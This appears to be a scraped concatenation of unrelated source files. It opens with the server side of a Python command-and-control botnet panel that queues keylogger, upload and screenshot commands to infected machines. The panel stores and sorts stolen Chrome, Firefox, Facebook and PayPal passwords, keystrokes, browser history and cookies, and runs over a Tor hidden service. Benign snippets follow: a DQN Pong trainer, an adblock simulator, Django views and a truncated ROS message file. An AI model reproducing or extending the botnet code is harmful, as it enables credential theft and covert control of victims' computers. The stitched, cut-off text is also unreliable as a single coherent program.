PAYLOAD = ''
COMPLETE_PACKET = find_between( buffer, "((", "))" )
REQUEST_TYPE = COMPLETE_PACKET.split(" ")[0]
HOST = find_between( COMPLETE_PACKET , "Host:", "\n" )
HOST = HOST.replace(" ","")
USER_AGENT = find_between( COMPLETE_PACKET , "User-Agent:", "\n" )
USER_AGENT = USER_AGENT.replace(" ","")
LANGUAGE = find_between( COMPLETE_PACKET , "Accept-Language:", "," )
LANGUAGE = LANGUAGE.replace(" ","")
HOUR = COMPLETE_PACKET.split("{{{")[1]
COOKIE = find_between( COMPLETE_PACKET , "Cookie:", "auth_key" )
COOKIE = COOKIE.replace(" ","")
PAYLOAD = find_between( COMPLETE_PACKET , "auth_key=" , "{{{")
TABLE_PRESET = TABLE_PRESET.replace("{{Request-Type}}",REQUEST_TYPE)
TABLE_PRESET = TABLE_PRESET.replace("{{Host}}",HOST)
TABLE_PRESET = TABLE_PRESET.replace("{{User-Agent}}",USER_AGENT)
TABLE_PRESET = TABLE_PRESET.replace("{{Language}}",LANGUAGE)
TABLE_PRESET = TABLE_PRESET.replace("{{Time}}",HOUR)
TABLE_PRESET = TABLE_PRESET.replace("{{Cookie}}",COOKIE)
TABLE_PRESET = TABLE_PRESET.replace("{{Payload}}",PAYLOAD)
final_html += TABLE_PRESET
if PAYLOAD == '':
try:
TABLE_PRESET = ''
TABLE_PRESET = TABLE_UNSORTED_PACKET.replace("{{pkt}}",COMPLETE_PACKET)
except:
pass
except:
final_html = 'File getauth.txt not found!'
html = html.replace("{{botid}}",botid)
kwords = ['password','username','pwd','usr','pass','user','email','referer']
try:
for word in kwords:
try:
TABLE_PRESET = TABLE_PRESET.replace(word,'<span style="color:black;background-color:#f4eb42;"><b>%s</b></span>'%word)
except:
pass
final_html = TABLE_PRESET
except:
pass
html = html.replace("{{Table_preset}}",final_html)
return html
class API(object):
@cherrypy.expose
@require_admin
def passupdate_setting(self, password=''):
SaveLog("REQUEST : 200 [ Ok ] | Admin password updated.")
set_admin_password(password)
@cherrypy.expose
@require_admin
def removebot(self, botid):
global BUFFER_BOT_REMOVED
cmd = "removeme"
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), cmd, False, html_escape(botid)))
SaveLog("Removing Bot.")
exec_DB("DELETE FROM bots WHERE name=?",(html_escape(botid),))
BUFFER_BOT_REMOVED.append(botid)
@cherrypy.expose
@require_admin
def klog(self, botid, cmd):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), "keylogger %s" % cmd , False, html_escape(botid)))
@cherrypy.expose
def pop(self, botid, sysinfo, ip):
global BUFFER_BOT_REMOVED
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
bot = query_DB("SELECT * FROM bots WHERE name=?", (botid,))
if not bot:
if botid in BUFFER_BOT_REMOVED :
SaveLog("Bot Removed Tried To Connect: botid => %s - sysinfo => %s - ip => %s" % (botid, sysinfo, ip))
BUFFER_BOT_REMOVED = []
else:
exec_DB("INSERT INTO bots VALUES (?, ?, ?, ?)", (html_escape(botid), time.time(), ip, html_escape(sysinfo)))
SaveLog("Storing New Bot : botid => %s - sysinfo => %s - ip => %s" % (botid, sysinfo, ip))
if not os.path.exists("DumpDir/%s" % botid):
os.makedirs("DumpDir/%s" % botid)
else:
exec_DB("UPDATE bots SET lastonline=? where name=?", (time.time(), botid))
cmd = query_DB("SELECT * FROM commands WHERE bot=? and sent=? ORDER BY date", (botid, 0))
if cmd:
exec_DB("UPDATE commands SET sent=? where id=?", (1, cmd[0][0]))
exec_DB("INSERT INTO output VALUES (?, ?, ?, ?)", (None, time.time(), "> " + cmd[0][2], html_escape(botid)))
return cmd[0][2]
else:
return ""
@cherrypy.expose
def worldupdate(self):
thread = Thread(target = worldgen)
thread.start()
thread.join()
@cherrypy.expose
def report(self, botid, output):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
if "{{info}}" in html_escape(output):
md_buffer = html_escape(output).split("{{info}}")[1]
out_file = open("DumpDir/%s/info.txt"% html_escape(botid),"w")
md_buffer = md_buffer.replace("{{info}}","")
out_file.write(md_buffer)
out_file.close()
elif "MD-STATUS" in html_escape(output):
md_buffer = html_escape(output).split(":")[1]
filename = "Logs/MassDownloadReport.txt"
out_file = open(filename,"a")
current_time = strftime("[%H-%M-%S_%d-%m-%Y]", gmtime())
texttowrite= str(current_time) + "\t[ " + str(html_escape(botid)) + " ] [ MD-STATUS:%s - OK ]\n" % str(md_buffer)
out_file.write(texttowrite)
out_file.close()
elif "{{KEYLOGS}}" in html_escape(output):
out_file = open("DumpDir//%s//Keystrokes.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("{{KEYLOGS}}","")
out_file.write(buffer_html)
out_file.close()
SaveLog("Updating Keystrokes.")
elif "KRC{{{" in html_escape(output):
if not os.path.exists("DumpDir//%s" % html_escape(botid)):
os.makedirs("DumpDir//%s"% html_escape(botid))
out_file = open("DumpDir//%s//KRC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("KRC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => Keywords Searched.")
elif "HIC{{{" in html_escape(output):
out_file = open("DumpDir//%s//HIC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("HIC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => History.")
elif "AFC{{{" in html_escape(output):
out_file = open("DumpDir//%s//AFC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("AFC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => Autofill Fields.")
elif "{{getrequestauth}}" in html_escape(output):
out_file = open("DumpDir//%s//getauth.txt" % html_escape(botid) ,"a")
buffer_html = ""
buffer_html = html_escape(output).replace("{{getrequestauth}}","")
out_file.write("===[[[((" + buffer_html + "))]]]===\n\n")
out_file.close()
SaveLog("Storing auth GET request.")
elif "CHROME PASSWORDS :" in html_escape(output):
buffer_html = ""
buffer_html = html_escape(output).replace("CHROME PASSWORDS :","")
buffer_html = buffer_html.replace("'" , "'")
out_file = open("DumpDir//%s.txt"% html_escape(botid),"w")
out_file.write("\nCHROME PASSWORDS : =================================================================================\n")
out_file.write(buffer_html)
out_file.close()
SaveLog("Storing Chrome Passwords.")
elif "FIREFOX PASSWORDS :" in html_escape(output):
buffer_html = ""
buffer_html = html_escape(output).replace("FIREFOX PASSWORDS :","")
buffer_html = buffer_html.replace("'" , "'")
out_file = open("DumpDir//%s-firefox.txt" % html_escape(botid),"w")
out_file.write("\nFIREFOX PASSWORDS : =================================================================================\n")
out_file.write(buffer_html)
out_file.close()
SaveLog("Storing Firefox Passwords.")
else:
exec_DB("INSERT INTO output VALUES (?, ?, ?, ?)", (None, time.time(), html_escape(output), html_escape(botid)))
@cherrypy.expose
@require_admin
def push(self, botid, cmd):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), cmd, False, html_escape(botid)))
SaveLog("REQUEST : 200 [ Ok ] | push.html")
if "upload" in cmd:
uploads = cmd[cmd.find("upload"):]
up_cmds = [i for i in uploads.split("upload ") if i]
for upload in up_cmds:
end_pos = upload.find(";")
while end_pos > 0 and cmd[end_pos - 1] == '\\':
end_pos = cmd.find(";", end_pos + 1)
upload_filename = upload
if end_pos != -1:
upload_filename = upload_filename[:end_pos]
pending_uploads.append(os.path.basename(upload_filename))
if cmd.startswith("screenshot"):
pending_uploads.append("screenshot")
@cherrypy.expose
@require_admin
def sortKW(self, keyword):
SaveLog("Request Password DB => Sorting By KeyWord : %s " % keyword)
argc_buffer = ""
index_result = 0
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
data = open(fileName).readlines()
for i in range(len(data)):
if keyword in data[i]:
if "," in data[i]:
argc_buffer = data[i]
else:
website = data[i].split("Website:")[1]
usr = data[i+2].split("Username:")[1]
pwd = data[i+4].split("Password:")[1]
argc_buffer += "--[ Result <b>%s</b> in <b>%s</b>\n\n" % (str(index_result),str(fileName))
argc_buffer += "<b>Website </b>: " + website.rstrip() + "\n"
argc_buffer += "<b>Username </b>: " + usr.rstrip() +"\n"
argc_buffer += "<b>Password </b>: " + pwd.rstrip() +"\n\n"
index_result += 1
out_file = open("TempDir/tmp.txt","w")
out_file.write(argc_buffer)
out_file.close()
data.close()
@cherrypy.expose
@require_admin
def sortIP(self, ip):
try:
write_buffer = ''
write_buffer0 = ''
file = open('DumpDir/%s.txt' %ip, 'r')
write_buffer += "--[ Results in <b>%s</b> \n\n" % ip
write_buffer_0 = file.read()
write_buffer_0 = write_buffer_0.replace("[*] All Firefox Passwords Dumped .","")
write_buffer_0 = write_buffer_0.replace("Website:","<b>Website</b>:")
write_buffer_0 = write_buffer_0.replace("Username:","<b>Username</b>:")
write_buffer_0 = write_buffer_0.replace("Password:","<b>Website</b>:")
write_buffer += write_buffer_0
out_file = open("TempDir/tmp.txt","w")
out_file.write(write_buffer)
out_file.close()
SaveLog("Request Password DB => Sorting By IP : %s " % ip)
except:
SaveLog("Error : Sorting by IP , No File Found.")
@cherrypy.expose
@require_admin
def sortSel(self, mode):
if mode == "face":
SaveLog("Request Password DB => Printing All Facebook Passwords")
argc_buffer = ""
index_result = 0
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
data = open(fileName).readlines()
for i in range(len(data)):
if "facebook" in data[i] or "Facebook" in data[i]:
if "," in data[i]:
argc_buffer = data[i]
else:
website = data[i].split("Website:")[1]
usr = data[i+2].split("Username:")[1]
pwd = data[i+4].split("Password:")[1]
argc_buffer += "--[ Result <b>%s</b> in <b>%s</b>\n\n" % (str(index_result),str(fileName))
argc_buffer += "<b>Website </b>: " + website.rstrip() + "\n"
argc_buffer += "<b>Username </b>: " + usr.rstrip() +"\n"
argc_buffer += "<b>Password </b>: " + <PASSWORD>.rstrip() +"\<PASSWORD>"
index_result += 1
out_file = open("TempDir/tmp.txt","w")
out_file.write(argc_buffer)
out_file.close()
if mode == "pp":
SaveLog("Request Password DB => Printing All PayPal Passwords")
argc_buffer = ""
index_result = 0
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
data = open(fileName).readlines()
for i in range(len(data)):
if "paypal" in data[i] or "Paypal" in data[i] or "PayPal" in data[i]:
if "," in data[i]:
argc_buffer = data[i]
else:
website = data[i].split("Website:")[1]
usr = data[i+2].split("Username:")[1]
pwd = data[i+4].split("Password:")[1]
argc_buffer += "--[ Result <b>%s</b> in <b>%s</b>\n\n" % (str(index_result),str(fileName))
argc_buffer += "<b>Website </b>: " + website.rstrip() + "\n"
argc_buffer += "<b>Username </b>: " + usr.rstrip() +"\n"
argc_buffer += "<b>Password </b>: " + pwd.rstrip() +"\n\n"
index_result += 1
out_file = open("TempDir/tmp.txt","w")
out_file.write(argc_buffer)
out_file.close()
if mode == "fir":
SaveLog("Request Password DB => Printing All Firefox Passwords")
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
useful_content = []
with open(fileName, 'r') as input:
all_lines = input.readlines() # read all lines
for idx in range(len(all_lines)): # iterate all lines
if 'FIREFOX PASSWORDS : ' in all_lines[idx]:
useful_content.append(all_lines[idx])
idx = idx + 1
# found start of useful contents, continue iterate till it ends
while '[*] All Firefox' not in all_lines[idx]:
useful_content.append(all_lines[idx])
idx = idx + 1
break
out_file = open("TempDir/tmp.txt","w")
for line in useful_content:
out_file.write(str(line))
out_file.close()
if mode == "chr":
SaveLog("Request Password DB => Printing All Chrome Passwords")
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
useful_content = []
with open(fileName, 'r') as input:
all_lines = input.readlines() # read all lines
for idx in range(len(all_lines)): # iterate all lines
if 'CHROME PASSWORDS : ' in all_lines[idx]:
useful_content.append(all_lines[idx])
idx = idx + 1
# found start of useful contents, continue iterate till it ends
while '[*] All Chrome' not in all_lines[idx]:
useful_content.append(all_lines[idx])
idx = idx + 1
break
out_file = open("TempDir/tmp.txt","w")
for line in useful_content:
out_file.write(str(line))
out_file.close()
if mode == "all":
SaveLog("Request Password DB => Printing All Passwords")
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
in_file = open(fileName,"r")
text = in_file.read()
in_file.close()
out_file = open("TempDir/tmp.txt","w")
out_file.write(text)
out_file.close()
@cherrypy.expose
@require_admin
def stdout(self, botid):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
output = ""
bot_output = query_DB('SELECT * FROM output WHERE bot=? ORDER BY date DESC', (botid,))
for entry in reversed(bot_output):
if "infopc" in entry[2] or "removeme" in entry[2] or "keylogger" in entry[2]:
pass
else:
output += "%s\n\n" % entry[2]
bot_queue = query_DB('SELECT * FROM commands WHERE bot=? and sent=? ORDER BY date', (botid, 0))
for entry in bot_queue:
output += "> %s [PENDING...]\n\n" % entry[2]
SaveLog("Sending Command : %s" %entry[2])
return output
# Startup server
def main():
# ----- Handler Keyboard Interupt -----
signal.signal(signal.SIGINT, signal_handler)
# ------------------------
# ----- Tor service start -----
try:
os.system("sudo service tor start > /dev/null")
except:
pass
# ----- Server conf -----
app = Main()
app.api = API()
app.cnc = CNC()
cherrypy.config.update("conf/server.conf")
app = cherrypy.tree.mount(app, "", "conf/server.conf")
app.merge({"/": { "error_page.default": error_page}})
# ------------------------
# ----- Folder Creator -----
makedir.run("logs")
# --------------------------
# ----- Onion hostname reader -----
try:
in_file = open("/var/lib/tor/hidden_service/hostname","r")
text = in_file.read()
in_file.close()
SaveLog("Starting onion server on : http://%s:%s"%( text.rstrip() , cherrypy.config["server.socket_port"]))
except:
pass
# --------------------------
# ----- Server start -----
SaveLog("Starting clearnet server on : http://%s:%s"% (cherrypy.config["server.socket_host"], cherrypy.config["server.socket_port"]))
cherrypy.engine.start()
cherrypy.engine.block()
# --------------------------
# Welcome message
def welcome():
global SYS_VERSION
os.system("clear")
cprint('\n\n\t.oooooo..o . ', 'blue')
cprint('\td8P' 'Y8 .o8 ', 'cyan')
cprint('\tY88bo. oo.ooooo. .oooo. .ooooo. .ooooo. ooo. .oo. .ooooo. .o888oo ', 'blue')
cprint("\t '''Y8888o. 888' '88b 'P )88b d88' 'Y8 d88' '88b '888P'Y88b d88' '88b 888 ", 'cyan')
cprint('\t `"Y88b 888 888 .oP"888 888 888ooo888 888 888 888ooo888 888 ', 'blue')
cprint('\too .d8P 888 888 d8( 888 888 .o8 888 .o 888 888 888 .o 888 . ', 'cyan')
cprint("\t8''88888P' 888bod8P' 'Y888''8o 'Y8bod8P' 'Y8bod8P' o888o o888o 'Y8bod8P' '888' ", 'blue', end=' ')
cprint("V"+SYS_VERSION, 'blue')
cprint('\t 888 ', 'cyan')
cprint('\t o888o \n', 'blue')
cprint("__[ ! ] Software : Spacenet", 'white')
cprint("__[ ! ] Version : 0.0.1", 'white')
cprint("__[ ! ] Author : Spaceb4r", 'white')
cprint("__[ ! ] Help : See UsersGuide.pdf", 'yellow')
cprint("------------------------------------------------------------------------------------------------------\n", 'white' ,attrs=['bold'] )
# Main starting function
if __name__ == "__main__":
welcome()
main()
``` |
{
"source": "4nar/wimblepong_dqn",
"score": 2
} |
#### File: 4nar/wimblepong_dqn/train_new.py
```python
import collections
import matplotlib.pyplot as plt
from random import randint
import pickle
import gym
import numpy as np
import argparse
import wimblepong
from wimblepong.dqn_net import DQN
import torch
from torch.utils.tensorboard import SummaryWriter
from wimblepong.agent import ExperienceReplay, Agent
import torch.optim as optim
import torch.nn as nn
import cv2
def _rgb2gray(rgb):
res = cv2.resize(rgb[...,:3], dsize=(84, 84), interpolation=cv2.INTER_CUBIC)
res = np.matmul(res[...,:3], np.array([0.2989, 0.5870, 0.1140]))
res = np.reshape(res, (84, 84, 1))
return res
def preprocess(frame):
if frame.size == 200 * 200 * 3:
img = np.reshape(frame, [200, 200, 3]).astype(np.float32)
else:
assert False, "Unknown resolution."
img = img[:, :, 0] * 0.299 + img[:, :, 1] * 0.587 + img[:, :, 2] * 0.114
resized_screen = cv2.resize(img, (84, 110), interpolation=cv2.INTER_AREA)
x_t = resized_screen[18:102, :]
x_t = np.reshape(x_t, [84, 84, 1])
return x_t.astype(np.uint8)
parser = argparse.ArgumentParser()
parser.add_argument("--headless", action="store_true", help="Run in headless mode")
parser.add_argument("--housekeeping", action="store_true",
help="Plot, player and ball positions and velocities at the end of each episode")
parser.add_argument("--fps", type=int, help="FPS for rendering", default=30)
parser.add_argument("--scale", type=int, help="Scale of the rendered game", default=1)
args = parser.parse_args()
# Make the environment
# env = gym.make("WimblepongVisualMultiplayer-v0")
DEFAULT_ENV_NAME = "WimblepongVisualSimpleAI-v0"
env = gym.make(DEFAULT_ENV_NAME)
env.unwrapped.scale = args.scale
env.unwrapped.fps = args.fps
# Number of episodes/games to play
episodes = 1000
D = 200 * 200
# Define the player
player_id = 1
# Set up the player here. We used the SimpleAI that does not take actions for now
# policy = Policy(D, 3)
# player = Agent(policy)
# player = Agent(env, player_id)
# Housekeeping
states = []
win1 = 0
win_hist = []
device = torch.device("cpu")
net = DQN((4,84,84), env.action_space.n).to(device)
target_net = DQN((4,84,84), env.action_space.n).to(device)
writer = SummaryWriter(comment="-" + DEFAULT_ENV_NAME)
replay_size = 10000
# replay_size = 500
buffer_g = ExperienceReplay(replay_size)
agent = Agent(env, buffer_g)
eps_start=1.0
epsilon = eps_start
learning_rate = 1e-4
eps_decay=.999985
eps_min=0.02
optimizer = optim.Adam(net.parameters(), lr=learning_rate)
total_rewards = []
frame_idx = 0
best_mean_reward = None
MEAN_REWARD_BOUND = 19.0
replay_start_size = 10000
# replay_start_size = 500
batch_size = 32
gamma = 0.99
sync_target_frames = 1000
done = False
while True:
epsilon = max(epsilon * eps_decay, eps_min)
frame_idx += 1
reward, done = agent.play_step(net, epsilon, device=device)
print(reward, done)
if reward is not None:
total_rewards.append(reward)
mean_reward = np.mean(total_rewards[-100:])
print("%d: %d games, mean reward %.3f, (epsilon %.2f)" % (
frame_idx, len(total_rewards), mean_reward, epsilon))
writer.add_scalar("epsilon", epsilon, frame_idx)
writer.add_scalar("reward_100", mean_reward, frame_idx)
writer.add_scalar("reward", reward, frame_idx)
        if best_mean_reward is None or best_mean_reward < mean_reward:
            torch.save(net.state_dict(), DEFAULT_ENV_NAME + "-best.dat")
            if best_mean_reward is not None:
                print("Best mean reward updated %.3f -> %.3f" % (best_mean_reward, mean_reward))
            best_mean_reward = mean_reward
if mean_reward > MEAN_REWARD_BOUND:
print("Solved in %d frames!" % frame_idx)
break
if len(buffer_g) < replay_start_size:
print('here')
continue
batch = buffer_g.sample(batch_size)
states, actions, rewards, dones, next_states = batch
states_v = torch.tensor(states).to(device)
next_states_v = torch.tensor(next_states).to(device)
actions_v = torch.tensor(actions).to(device)
rewards_v = torch.tensor(rewards).to(device)
done_mask = torch.ByteTensor(dones).to(device)
state_action_values = net(states_v).gather(1, actions_v.unsqueeze(-1)).squeeze(-1)
print('state_action_values.shape', state_action_values.shape)
next_state_values = target_net(next_states_v).max(1)[0]
next_state_values[done_mask] = 0.0
next_state_values = next_state_values.detach()
expected_state_action_values = next_state_values * gamma + rewards_v
loss_t = nn.MSELoss()(state_action_values, expected_state_action_values)
optimizer.zero_grad()
loss_t.backward()
optimizer.step()
if frame_idx % sync_target_frames == 0:
target_net.load_state_dict(net.state_dict())
writer.close()
``` |
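As a quick sanity check of the frame pipeline, `preprocess()` can be exercised on a dummy Wimblepong-sized observation. The zero frame below is a stand-in, and the function is assumed to already be in scope (importing the script itself would start training):
```python
import numpy as np

# Stand-in for one 200x200 RGB frame from the environment.
dummy_frame = np.zeros((200, 200, 3), dtype=np.uint8)
processed = preprocess(dummy_frame)  # preprocess() as defined in the script above
print(processed.shape, processed.dtype)  # expected: (84, 84, 1) uint8
```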
{
"source": "4nd3r/adblock-simulator",
"score": 3
} |
#### File: 4nd3r/adblock-simulator/adblock_simulator.py
```python
import argparse
import json
import os
import re
import sys
import urllib.parse
import adblock
from publicsuffixlist import PublicSuffixList
class AdblockSimulator:
def add_filter_list(self, filter_list, fmt='standard'):
for item in filter_list:
if os.path.isfile(item):
if not self.add_filter_list_from_file(item, fmt):
return False
elif isinstance(item, str):
if not self.add_filter_list_from_string(item, fmt):
return False
else:
return False
return True
def add_hosts(self, hosts):
return self.add_filter_list(hosts, 'hosts')
def add_filter_list_from_file(self, filter_list_file, fmt='standard'):
try:
handle = open(filter_list_file, 'r')
filter_list_string = handle.read()
handle.close()
except Exception:
return False
return self.add_filter_list_from_string(filter_list_string, fmt)
_filter_set = None
_engine = None
def add_filter_list_from_string(self, filter_list_string, fmt='standard'):
try:
if self._filter_set is None:
self._filter_set = adblock.FilterSet()
self._filter_set.add_filter_list(filter_list_string, fmt)
self._engine = adblock.Engine(filter_set=self._filter_set)
except Exception:
return False
return True
def _prepend_url_scheme(self, url):
if not url.startswith('http://') \
and not url.startswith('https://'):
url = f'http://{url}'
return url
def _get_host(self, url):
url = self._prepend_url_scheme(url)
return urllib.parse.urlparse(url).netloc
_psl = None
def _get_domain(self, host):
if self._psl is None:
self._psl = PublicSuffixList(only_icann=True)
return self._psl.privatesuffix(host)
def _url_sort_key(self, url):
host = self._get_host(url)
if not host:
return url
domain = self._get_domain(host)
if not domain:
return host
return domain
def simulate(self, src_url, dst_urls_list):
if os.path.isfile(src_url):
try:
handle = open(src_url, 'r')
src_url = handle.read().strip()
handle.close()
except Exception:
return False
src_url = self._prepend_url_scheme(src_url)
dst_urls = []
for item in dst_urls_list:
if os.path.isfile(item):
try:
handle = open(item, 'r')
for line in handle:
dst_urls.append(line.strip())
handle.close()
except Exception:
return False
elif isinstance(item, str):
dst_urls.append(item)
results = {}
for dst_url in sorted(dst_urls, key=self._url_sort_key):
dst_url = self._prepend_url_scheme(dst_url)
blocker = self._engine.check_network_urls(
url=dst_url,
source_url=src_url,
request_type='')
results[dst_url] = not blocker.matched
return results
if __name__ == '__main__':
cli = argparse.ArgumentParser(add_help=False)
cli.add_argument('-f', metavar='FILTERS', action='append')
cli.add_argument('-h', metavar='HOSTS', action='append')
cli.add_argument('-s', required=True, metavar='SOURCE')
cli.add_argument('-d', required=True, metavar='DESTINATION', action='append')
cli.add_argument('-r', metavar='REGEX')
cli.add_argument('-j', action='store_true')
cli.add_argument('-a', action='store_true')
cli.add_argument('-b', action='store_true')
args = cli.parse_args()
if not args.f and not args.h:
cli.error('one of the following arguments is required: -f, -h')
AS = AdblockSimulator()
if args.f:
if not AS.add_filter_list(args.f):
print('adding filter list failed')
sys.exit(1)
if args.h:
if not AS.add_hosts(args.h):
print('adding hosts failed')
sys.exit(1)
results = AS.simulate(args.s, args.d)
if not results:
print('simulation failed')
sys.exit(1)
if args.r:
for result in results.copy():
if not re.search(args.r, result):
del results[result]
if args.j:
print(json.dumps(results, indent=4))
else:
for dst_url in results:
if results[dst_url]:
if args.a:
print(dst_url)
elif not args.b:
print(f'\x1b[32;1mALLOW\x1b[0m {dst_url}')
else:
if args.b:
print(dst_url)
elif not args.a:
print(f'\x1b[31;1mBLOCK\x1b[0m {dst_url}')
``` |
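A minimal programmatic usage sketch of the class above; the filter rule and URLs are made-up examples, not part of the project.

```python
sim = AdblockSimulator()
# One EasyList-style rule that blocks any request to ads.example.com (illustrative only).
sim.add_filter_list(['||ads.example.com^'])

results = sim.simulate('https://news.example.org/',
                       ['https://ads.example.com/banner.js',
                        'https://cdn.example.org/app.js'])
for dst_url, allowed in results.items():
    print('ALLOW' if allowed else 'BLOCK', dst_url)
```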
{
"source": "4ndersonLin/stockpile",
"score": 2
} |
#### File: app/parsers/scan.py
```python
from app.objects.secondclass.c_fact import Fact
from app.objects.secondclass.c_relationship import Relationship
from app.utility.base_parser import BaseParser
class Parser(BaseParser):
def parse(self, blob):
relationships = []
for match in self.line(blob):
values = match.split(':')
for mp in self.mappers:
relationships.append(
Relationship(source=Fact(mp.source, values[0]),
edge=mp.edge,
target=Fact(mp.target, values[1]))
)
return relationships
``` |
{
"source": "4ndr/data-gather",
"score": 2
} |
#### File: data-gather/core/views.py
```python
import json
import requests
from django.shortcuts import render
# Create your views here.
def base(request):
smartcitizen = requests.get('https://api.smartcitizen.me/v0/devices/world_map')
smartcitizen_data = json.dumps(smartcitizen.json())
lass = requests.get('https://pm25.lass-net.org/data/last-all-lass.json')
lass_data = json.dumps(lass.json())
openaq = requests.get('https://api.openaq.org/v1/measurements')
openaq_data = json.dumps(openaq.json())
data = {'data1': smartcitizen_data, 'data2': lass_data, 'data3': openaq_data, }
return render(request, 'base.html', data)
```
#### File: data-gather/map/views.py
```python
from django.shortcuts import render
from django.http import JsonResponse
import requests
import json
# Create your views here.
def show_map(request):
template = 'map.html'
return render(request, template)
def send_map_data(request, data_base, date=None):
data_set = None
if date:
if data_base == '1':
smartcitizen = requests.get('https://api.smartcitizen.me/v0/devices/')
data_set = json.dumps(smartcitizen.json())
elif data_base == '2':
lass = requests.get('https://pm25.lass-net.org/data/last-all-lass.json')
data_set = json.dumps(lass.json())
elif data_base == '3':
openaq = requests.get('https://api.openaq.org/v1/measurements?limit=1000&date_from=' + date)
data_set = json.dumps(openaq.json())
else:
if data_base == '1':
smartcitizen = requests.get('https://api.smartcitizen.me/v0/devices/')
data_set = json.dumps(smartcitizen.json())
elif data_base == '2':
lass = requests.get('https://pm25.lass-net.org/data/last-all-lass.json')
data_set = json.dumps(lass.json())
elif data_base == '3':
openaq = requests.get('https://api.openaq.org/v1/measurements?limit=1000')
data_set = json.dumps(openaq.json())
data = {'data': data_set, }
return JsonResponse(data)
``` |
{
"source": "4ndre4s/Corium",
"score": 3
} |
#### File: Nominax/ByteCodeInterface/Generate.py
```python
import os
def read_txt(path: str) -> str:
if os.path.isfile(path):
with open(path, 'r') as file:
print("Reading: " + path)
return file.read()
else:
print("File not found: " + path)
exit(-1)
print("Nominax bytecode interface generator for Rust")
print("Copyright 2021 <NAME> \"pinsrq\" <<EMAIL>>")
def generate(template_file, output, useDots = False):
template = read_txt(template_file)
nox_dir = "../Include/Nominax/ByteCode/"
instruction_enum = read_txt(nox_dir + "ExportInstructionEnum.hpp")
category_enum = read_txt(nox_dir + "ExportInstructionCategoryEnum.hpp")
syscall_enum = read_txt(nox_dir + "ExportSysCallEnum.hpp")
mnemonic_table = read_txt(nox_dir + "ExportInstructionMnemonicTable.hpp")
category_table = read_txt(nox_dir + "ExportInstructionCategoryTable.hpp")
push_record_table = read_txt(nox_dir + "ExportInstructionPushRecordTable.hpp")
pop_record_table = read_txt(nox_dir + "ExportInstructionPopRecordTable.hpp")
immediate_table = read_txt(nox_dir + "ExportInstructiontImmediateTable.hpp")
descriptor_table = read_txt(nox_dir + "ExportInstructionDescriptorTable.hpp")
template = template.replace("$INSTRUCTION$", instruction_enum)
template = template.replace("$INSTRUCTION_CATEGORY$", category_enum)
template = template.replace("$MNEMONIC_TABLE$", mnemonic_table)
template = template.replace("$CATEGORY_TABLE$", category_table)
template = template.replace("$PUSH_RECORD_TABLE$", push_record_table)
template = template.replace("$POP_RECORD_TABLE$", pop_record_table)
template = template.replace("$IMMEDIATE_TABLE$", immediate_table)
template = template.replace("$DESCRIPTOR_TABLE$", descriptor_table)
template = template.replace("$SYSCALL$", syscall_enum)
# if language uses . instead of :: as scope operator:
if useDots:
template = template.replace("::", ".")
print("Writing generated code: " + output)
with open(output, "wt") as text_file:
text_file.write(template)
generate("Rust/Template.rs", "Rust/NominaxByteCodeInterface/src/lib.rs")
generate("C#/Template.cs", "C#/NominaxByteCodeInterface/Lib.cs", True)
``` |
{
"source": "4ndreas/ROSCoffeButler",
"score": 2
} |
#### File: arbotix_msgs/srv/_SetupChannel.py
```python
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SetupChannelRequest(genpy.Message):
_md5sum = "c65e58d8b3b4d406126f6dc829a6011f"
_type = "arbotix_msgs/SetupChannelRequest"
_has_header = False #flag to mark the presence of a Header object
_full_text = """
string topic_name
uint8 pin
uint8 value
uint8 rate
"""
__slots__ = ['topic_name','pin','value','rate']
_slot_types = ['string','uint8','uint8','uint8']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
topic_name,pin,value,rate
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SetupChannelRequest, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.topic_name is None:
self.topic_name = ''
if self.pin is None:
self.pin = 0
if self.value is None:
self.value = 0
if self.rate is None:
self.rate = 0
else:
self.topic_name = ''
self.pin = 0
self.value = 0
self.rate = 0
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self.topic_name
length = len(_x)
